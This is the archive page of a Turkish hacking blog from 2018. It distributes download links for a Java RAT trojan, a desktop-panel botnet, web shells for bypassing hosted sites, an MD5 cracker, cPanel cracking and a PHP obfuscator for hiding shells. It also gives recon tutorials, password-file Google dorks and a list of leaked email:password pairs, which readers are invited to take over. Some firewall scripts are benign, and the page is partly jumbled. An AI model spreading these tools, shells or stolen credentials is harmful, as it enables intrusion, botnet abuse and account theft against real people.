Güncell Konular ;

Archive for 2018Kullanımı Ve Tanıtımı:


İNDİR;


https://anonfile.com/060bLao4b6/bypassconfig_zip 

https://www.dosyaupload.com/el3u

https://uploadfiles.io/dmk7dPriv8 Config Password Tool

26 Aralık 2018 Çarşamba
Priv MD5 Cracker Tool (Piyasadaki En Hızlı MD5 Kıran EXE Diyebiliriz)
İyi Heykler

ZİP PASS: b0ru70İNDİR:


Md5 Cracker Tool

17 Aralık 2018 Pazartesi
"viewdns" gibi reverse ip yapan siteler belirbi siteden sonra ücret istediği olmakta sizlere full olark ücretsiz kullanabilceğiniz bir sistem hazırladım. (aslında kendi için hazırladım sizde kullanırsınız :D )


ZİP PASS: b0ru70INDİR:Java İle Yazılmasından Ötürü Linux PC Lerdede Kullanabilceğiniz TROJAN :)


İNDİRME LİNKERLİ (DOWNLOADS):


1

2

3


4

jRAT (Linux RAT)

12 Aralık 2018 Çarşamba


İlla Masaüstü (EXE) Panelli bi botnet arıyorsanız tavsiyemdir. güvenilir download linkiyle sizinle  pyalaşıyorum :)

GOOD HACKİNG..İNDİR:
IP-Killer Botnet (Temiz)

9 Aralık 2018 Pazar

Şuanda Linux'un Disklerini Biçimlendirip Win. Kurduğunuzu Farzediyorum.

Şuanda Yapıcağınız işlem boot sırasındaki hatalardan kurtulmanızı sağlıcak.
 (tavsiyem: ilk bi bios pilini çıakrtıp bios ayarlarını default hale getirin..)

Şimdi Size Verdiğim Programla Videodaki İşlemi Uygulayın;https://youtu.be/AAWBZq04Izc

Gerekli Mataryeller(Program):

https://yadi.sk/d/bStUKj4AgEimsw
MBRFİX - Linux Silme Rehberi

5 Aralık 2018 Çarşamba
Ajanlar.Org a Özel Bypass Shell Yayında 

İlk Olarak http://ajanlar.org adresine girip.


Foruma Girdiğinizde Akabinden (Üstbar) Tools+ > Ajanlar Tools > Ajanlar Web Shell 
e tıklayıp shellin açık temiz kaynak kodlarına ulaşabilirsiniz..

"ajan.php" olarak kayddip güle güle kullanın :)


(Direk İndirme Linki Konun Altında)


SHELLDEN GÖRÜNTÜLER:(NOT: RESİMDEKİ SHELLİ DİZİNDEN SİLDİM BOŞUNA ARAMAYIN)DİREK İNDİRME LİNKİ:
Çağımızda En Çok Kullanılan Saldırı Çeşitlerinden Biri Olan DoS / DDoS Saldırılarından Korunmak İçin Firewall Kurulumunu Paylaşmak İstedim,

Neyse Uzatmadan Direk Kurulumu Gösterip Kouyu Bitiryim :) ;

bash install.sh
ctrl + z
(verilen çıktıdaki "ddos.conf" dosyasını istediğiniz ayyarları yapınız nano ile açıp)

rm apf-current.tar.gz
cd apf*
bash install.sh
SON FİREWALLINIZ HAZIR Bİ "reboot" atın ve korumalı serverinizde sitelerinizi rahatça barındırın..İster Shellerinizi İster Güvenlik İçin Config Dosyalarınızı Yada Her Türlü PHP Dosyanızı Şifrelemek İçin Kullanabilirsiniz..

KULLANIMI:

 A Kabindeki TextBox a PHP Kodlarınızı Yapıştırıp "Submit" Butomuna Basmanız Yeterlidir PHP Şifreleme Mothodunu Değiştirerekte Daha Sağlam Şifreleyebilirsiniz..

 ---------------


İNDİRME LİNKLERİ:


https://anonfile.com/EaQ7T2j0be/phpOB_phpVENOM Priv Bypass Shell

12 Ekim 2018 Cuma
Tag :, Tag :, Tag :, Tag :, Tag :, Tag :, Tag :, Tag :
Aktif Bilgi Toplama;

    Penetrasyon Testlerinde İkinci Adım Aktif Bilgi Toplamadır
Aktif Bilgi Toplar İken Hedef İle Bilgiler Etkileşime Girdiğimiz İçinde Loglara Düşersiniz
Hedef’ten Bilgi Toplarken Bize Yardımcı Olacak Toollar (DIG,NSLOOKUP,NMAP,NETCAT,DNSENUM,Fierce,DNSMAP,TRACEROUTE,)
1.DIG Aracı DNS Sorgularında Kullanılan Bir Araçtır
dig <siteadi> olarak kullanıldığında size domaine bağlı olan A Kaydını göstermektedir.
dig b0ru70.blogspot.com
dig <siteadi> -t NS olarak kullanıldığı zaman NS kayıtlarını listelemektedir.
dig b0ru70.blogspot.com -t NS
dig <siteadi> -t MX olarak kullanıldığı zaman MX kayıtlarını listelemektedir.
dig b0ru70.blogspot.com -t MX
dig <siteadi> -t txt olarak kullanıldığı zaman TXT kayıtlarını listelemektedir.
dig b0ru70.blogspot.com -t TXT
dig -x <ipadresi> +short olarak kullanıldığı zaman eskiden kullanılan kayıtları listelemektedir. Bir nevi kazı işlemi yapar
dig -x b0ru70.blogspot.com +short

2.NSLOOKUP Aracı DNS Sunucusunun Çalışıp Çalışmadığını Kontrol Eder
Nslookup
> b0ru70.blogspot.com
Server:  192.168.12.2
Address:  192.168.12.2#53
Non-authoritative answer:
b0ru70.blogspot.com    canonical name = blogspot.l.googleusercontent.com.
Name:    blogspot.l.googleusercontent.com
Address: 172.217.17.193
Name:    blogspot.l.googleusercontent.com
Address: 2a00:1450:4017:808::2001
>


3.NMAP Ağ Tarama Aracıdır
root@b0ru:~# nmap
Nmap 7.70 ( https://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  --exclude-ports <port ranges>: Exclude the specified ports from scanning
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma-separated list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
  --data <hex string>: Append a custom payload to sent packets
  --data-string <string>: Append a custom ASCII string to sent packets
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (https://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLESUsage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  --exclude-ports <port ranges>: Exclude the specified ports from scanning
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma-separated list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
  --data <hex string>: Append a custom payload to sent packets
  --data-string <string>: Append a custom ASCII string to sent packets
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
EXAMPLES:
  nmap -v -A scanme.nmap.org
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (https://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
4.Netcat TCP ve UDP Protokollerini Kullanarak Ağ Taraması ve Yazma Okuma Aracı
$ nc [options] host port
Host: Hedefin IP adresidir.
Port: Hedefin port numarası ya da numaralarıdır. Yani birden fazla port dinlenebilir.
Options:
-l: (listen mode) dinleme modu
-L: (Listen harder) Netcat’in sadece windows için hazırlanan sürümlerinde geçerlidir. Client tarafı connection’ı sonlandırsa bile dinleme modunu tekrar başlatır. Böylece Netcat’i ısrarlı bir dinleyici haline getirmiş olur.
-u: (UDP mode) ön tanımlı olarak TCP gelir. Bunun yerine UDP kullanmak için bu opsiyonu kullanabiliriz.
-p:(Local port) Listen modundayken dinlenen portun, client modundayken tüm paketlerin gönderileceği kaynak portun belirtildiği opsiyondur.
-e: Eğer connection olursa sonrasında program çalıştığında STDIN ve STDOUT ile iletişim kurmak için kullanılan opsiyondur.
-n: DNS lookup’larda diğer tarafın makinelerinin isimlerinde değişikliklik/oynama olamaması için kullanılacak opsiyon.
-z: Zero-I/O modudur. Herhangibir datanın yollanmamasıdır. Sadece payload dışında bir paketin yollanması için kullanılan opsiyondur.
-wN: Connection’ın timeout olması yani süresinin dolması halinde STDIN kapandıktan sonra N saniye daha beklenir. Bir Netcat client ya da listener’ı bu opsiyon ile yeni bir connection açmak için N saniye bekleyecektir. Eğer bu süre içinde yeni bir connection oluşmazsa Netcat çalışmayı durduracaktır.
-v: (Be verbose) Connection sırasında Standard Error’da olan mesajların ayrıntılı biçimde yazılmasını söyleyen opsiyondur.
-vv: (Be very verbose) Standard Errror’da -v opsiyonundan daha daha fazla detaylı yazılmasının söylendiği opsiyonel durumdur.
Opsiyon çeşitlerimiz bunlardı. Şimdi opsiyonları anlatırken Client ve Listener modlarından bahsetmiştik onların temel ifade edilişlerini inceleyelim:
– Temel Netcat Client:
$ nc [Hedef IP adresi] [Port]
Burada client modda hedef IP üzerindeki istenilen portta bir connection başlatmış oluruz.
– Temel Netcat Listener
$ nc -l -p [Local Port]
5. DNSENUM Hedef Hakkında Bilgi VE Analiz Aracıdır
Ve ulaşabiliceğimiz Bilgiler
Host Adreslerine

Server Adlarına

Mail Adreslerine

Tryine Zone Bilgilerine

✰Subdomain Bilgilerine
root@b0ru:~#  dnsenum -h
Smartmatch is experimental at /usr/bin/dnsenum line 698.
Smartmatch is experimental at /usr/bin/dnsenum line 698.
dnsenum VERSION:1.2.4
Usage: dnsenum [Options] <domain>
[Options]:
Note: the brute force -f switch is obligatory.
GENERAL OPTIONS:
  --dnsserver     <server>
            Use this DNS server for A, NS and MX queries.
  --enum        Shortcut option equivalent to --threads 5 -s 15 -w.
  -h, --help        Print this help message.
  --noreverse        Skip the reverse lookup operations.
  --nocolor        Disable ANSIColor output.
  --private        Show and save private ips at the end of the file domain_ips.txt.
  --subfile <file>    Write all valid subdomains to this file.
  -t, --timeout <value>    The tcp and udp timeout values in seconds (default: 10s).
  --threads <value>    The number of threads that will perform different queries.
  -v, --verbose        Be verbose: show all the progress and all the error messages.
GOOGLE SCRAPING OPTIONS:
  -p, --pages <value>    The number of google search pages to process when scraping names,
            the default is 5 pages, the -s switch must be specified.
  -s, --scrap <value>    The maximum number of subdomains that will be scraped from Google (default 15).
BRUTE FORCE OPTIONS:
  -f, --file <file>    Read subdomains from this file to perform brute force.
  -u, --update    <a|g|r|z>
            Update the file specified with the -f switch with valid subdomains.
    a (all)        Update using all results.
    g        Update using only google scraping results.
    r        Update using only reverse lookup results.
    z        Update using only zonetransfer results.
  -r, --recursion    Recursion on subdomains, brute force all discovred subdomains that have an NS record.
WHOIS NETRANGE OPTIONS:
  -d, --delay <value>    The maximum value of seconds to wait between whois queries, the value is defined randomly, default: 3s.
  -w, --whois        Perform the whois queries on c class network ranges.
             **Warning**: this can generate very large netranges and it will take lot of time to performe reverse lookups.
REVERSE LOOKUP OPTIONS:
  -e, --exclude    <regexp>
            Exclude PTR records that match the regexp expression from reverse lookup results, useful on invalid hostnames.
OUTPUT OPTIONS:
  -o --output <file>    Output in XML format. Can be imported in MagicTree (www.gremwell.com)
-enum: Google üzerinden subdomain arar.

 -o: Bu parametre sonuçları xml olarak kaydeder.
 -f: Sözlük kullanarak bruteforce yapılır.
 -w: Bu parametre whois bilgilerine ulaşır.
 -h: Yardım parametresi.
 -dnsserver: Bu parametre dns ile arama yapar.
 -r: Subdomainler için bruteforce kullanır.
 -u: Update parametresi.
6.Fierce DNS Serverini Sorgulama Aracı
root@b0ru:~# fierce -dns b0ru70.blogspot.com
DNS Servers for b0ru70.blogspot.com:

Trying zone transfer first...

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
    ** Found 92314972114.b0ru70.blogspot.com at 216.58.206.193.
    ** High probability of wildcard DNS.
Now performing 2280 test(s)...

Subnets found (may want to probe here using nmap or unicornscan):

Done with Fierce scan: http://ha.ckers.org/fierce/
Found 0 entries.

Have a nice day.
7.DNSMAP Alan adına ait subdomainler tespit etmek için kullanılan araçtır
dnsmap 0.30 – DNS Network Mapper by pagvac (gnucitizen.org)

usage: dnsmap <target-domain> [options]
options:
-w <wordlist-file>
-r <regular-results-file>
-c <csv-results-file>
-d <delay-millisecs>
-i <ips-to-ignore> (useful if you're obtaining false positives)

e.g.:
dnsmap target-domain
dnsmap target-domain -w yourwordlist.txt -r /tmp/domainbf_results.txt
dnsmap target-fomain -r /tmp/ -d 3000
dnsmap target-fomain -r ./domainbf_results.txt

8. Traceroute Basit Ağ Tarama Aracı
root@b0ru:~# traceroute www.gogle.com
traceroute to www.gogle.com (216.58.213.227), 30 hops max, 60 byte packets
 1  _gateway (192.168.12.2)  0.189 ms  0.065 ms  0.083 ms

Zenmate VPN Accont ;


LİST: https://paste.ubuntu.com/p/2x6kYtPq3N/

ZENMATE: https://zenmate.com/
 
CHROME: https://chrome.google.com/webstore/detail/zenmate-vpn-best-cyber-se/
 
WİNDOWS(CLİENT):https://zenmate.com/tr/urunler/windows-icin-vpn/ 

Firefox: https://zenmate.com/tr/urunler/firefox-vpn/

Yukardaki Bağlantılardan Zenmate VPN Yi İndirdikten SOnra Vermiş Olduğum Hesaplara Giriş Yaparak İnternette Zenmate Güvencesiyle Gezinebilirsiniz. %100 Güvenli Diyemem Eğer %100 güvenli logsuz vpn istiyorsanız vpn (özel sunucu tor ağılı) hizmeti vermekteyiz vpn hizmeti için iletişim:


Bi Kaçtanesi:

killer_fma@hotmail.com:alphonse33
no_angle27@hotmail.com:peatpeat
rdbsgkfks@naver.com:tjems77
thiefninja_1@hotmail.com:swordman
LONEWOLF5588@GMAIL.COM:BUSTERWOLF
sieging@gmail.com:leaf3214
christian1002@hotmail.es:czazaric11
gamingnow@live.com:796413
talatrum1@gmail.com:minhquan
iria_98@yahoo.fr:987654
niravr1995@gmail.com:91519151
charlycolega@hotmail.com:password123
nhuloan@gmail.com:asdfasdf
mpz._dizcros@msn.com:1234566
mert_karaer@hotmail.com:17011989
patrick.jacobs1123@yahoo.co.uk:snowy123
oatole@hotmail.com:cat111
rdbsgkfks@naver.com:tjems77
thiefninja_1@hotmail.com:swordman
LONEWOLF5588@GMAIL.COM:BUSTERWOLF
sieging@gmail.com:leaf3214
christian1002@hotmail.es:czazaric11
moommyk@gmail.com:roseall
 
 
Aldıkalrınızın Passını Değiştirip Güle Güle Kullanabilirsiniz.. 
 "Kaldığımız Yerden" Serimizin İlk Makalesi İle Karşınızdayız:
Penetrasyon Testlerinde İlk Adım Pasif Bilgi Toplamaktır.
Pasif Bilgi Toplarken Hedef ile ilgili Bilgiler İnternet Üzerinden Hedef ile
 Etkileşime Girmeden Bilgi Toplamaya Denir. Hedef’ten Bilgi Toplarken Bize
Yardımcı Olacak Kaynaklar (Whois,Dns Sorguları,Arşiv
Siteleri,Google,Bing,Yooho Gibi Arama Motorları,Facebook,Twitter Gibi Sosyal
 Ağlar ve Kariyer Siteleri) 1.Whois Ve DNS Sorgulama Whois ve DNS
Sorgulamasında Elde Edilebilicek Bilgiler Hedefin Ait Olan İp Aralıklarını Tespit Edilebilir DNS Sorgusu İle Hedefin Web,FTP,Mail Servislerinin İp Adresleri Bulunabilir Kayıtlı Alan Adı Yani Domain İsminden Hangi Sunucuda Barındığını, Kontak Kişinin Bilgisi, Mail Adresi, Telefon Numarası Ve Adres Bilgilerine
Ulaşılabilir Belirlenen Hedefin İp Adresinden Aktif Web Sitelerini Tespit Edebilirsiniz Whois Ve DNS Sorguları İçin Örnek Site 1.www.robtex.com (Whois üzerinden bir alan adına ait whois bilgileri sorgulanabilir, alan adı kimin üzerine kayıtlı telefon, faks, mail ve adres bilgilerine erişilebilir. Alan adının hangi nameserver üzerinde tutulduğu ve teknik kontağın da iletişim bilgileri elde edilebilir) Arşiv Siteleri Üzerinden Bilgi Toplama Arşiv Siteleri En Büyük Özelliği Web Sayfasının Geçmişe Dönük Olarak Çoğu Versiyonu Tutmasıdır Bilgi Toplar İken Hedefin Web Sayfasının Geçmiş Hallerinden Bilgi Toplanabilir Arşiv
Sitelerinden Biri web.archive.org Arama Motorlarıyla Bilgi Toplama Google Kullanımı Pasif bilgi toplama işleminde Google önemli bir yere sahiptir. Google ve internetin gelişmesi ile beraber Google Hacking adında bir kavram ortaya çıkmış, hakkında kitaplar dahi vardır. Google üzerinde yapılacak özel arama teknikleri ile dosya arama, mail adresi toplama, site index dizinlerinde gezinme gibi bir çok bilgi edinilebilir. Google üzerinde yapılacak detaylı ana sözcüklerinden bazıları aşağıda bulunmaktadır. Google ‘da alan adı(Domain Arama):
site:xyz.com
 Google ‘da dosya arama Filetype : xls Google ‘da bir web sitesi içinde xls dosyası arama
site:xyz.com Filetype:xls Google ‘de başlık bilgisi ile index dizininde gezinme
intitle:index of Google ‘da web sunucusu platform bilgisi alma
intitle:index.of “server at” Google ‘da web sayfalarının admin sayfalarını keşletme
intitle:index.of
inurl:“/admin/” Google ‘da parola dosyaları arama
intitle:index.of passwd
intitle:”Index.of..etc” passwd
intitle:index.of pwd.db passwd
intitle:index.of ws_ftp.ini
intitle:index.of people.lst
intitle:index.of passlist Google ‘da e-mail adresi toplama mail:@xyz.com Google ‘da belli web platformları arama (IIS, Apache Vs.) Apache/1.3.27 Server at Microsoft-IIS/5.0 server at
 
Bazı Toolar:
 


KURULUMU (sırasıyla):

(İşlemlerinizi Linux Üzerinden Yapıcaksınız)

$ apt update && apt upgrade
$ apt install git python2
$ git clone https://github.com/xHak9x/fbi.git
$ cd fbi
$ pip2 install -r requirements.txt
$ python2 fbi.py  


--

DİKKAT

Bunu nasıl kullanacağınızı karıştırırsanız, yardım menüsünü görüntülemek için lütfen 'yardım' yazınız.
    [Uyar] Bu programı kullanmadan önce lütfen VPN'nizi kapatın !!!
    [İpuçları] bu programı aşırı kullanmayın!
-
Hiçbir Sorumluluk Kabul Etmiyoruz Sadece Paylaşımını Yaptık KodlayanKişinin Sorumluluğundadır..Videodan İşlemleri Takip Edersiniz (İlk Auto SOnra Manuel Gösteriyorum..)

VHOST.PHP SHELL: https://pastebin.com/raw/zrpkkS5f

(En Kolay Yolu)
guard.sh (basic);

#!/bin/bash
# Accept already established connections (so it doesnt drop your current SSH session)
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# Accept SSH connections from anywhere
iptables -A INPUT -p tcp -i eth0 --dport ssh -j ACCEPT
# (Optional) Accept HTTP connections from anywhere
iptables -A INPUT -p tcp -i eth0 --dport 80 -j ACCEPT
# Block all other connections!
iptables -A INPUT -j DROP
# Unblock loopback interface
iptables -I INPUT 4 -i lo -j ACCEPT
# Enable logging of denied connections
iptables -I INPUT 5 -m limit --limit 5/min -j LOG --log-prefix "iptables denied: " --log-level 7
# Print current iptables rules
iptables -L -v
# Save current rules
iptables-save > /etc/iptables.up.rules
# (Manual step) Loading rules after boot:
# vi /etc/network/interfaces
# auto eth0
# iface eth0 inet dhcp
# pre-up iptables-restore < /etc/iptables.up.rules
# post-down iptables-restore < /etc/iptables.down.rules


guard2.sh (normal);

git clone https://github.com/fnzv/net-Shield.git

cd net-Shield

bash install.sh[VPS] Firewall (Scripts)

23 Eylül 2018 Pazar

Sesli Anlatımı İçin TIKLA


GOOD HACKİNG..

cPanel Cracking -Priv

26 Temmuz 2018 Perşembe
Bir Çok SW Yİ Tek Bu Tool İle Geçebilceksiniz..

Bu Bypass Shelli Paylaşmamın Sebebi Sanala Kuru Kuruya Ara Vermek İstemedim Gitmeden Sizlere Bir Hediye Bıraktım ^^

Bu Bir Son Değil Real Hayattaki İşlerim Bitsin Sanala Come Back Yapacağım :)

[Toolu VPSM DE Tutmaktaydım Yeni Kodlamadım..]

Görünümü;

Shelli İndir;

// 2010- B0RU70 Se☪uЯity - Hacklink Al , B0RU70 \\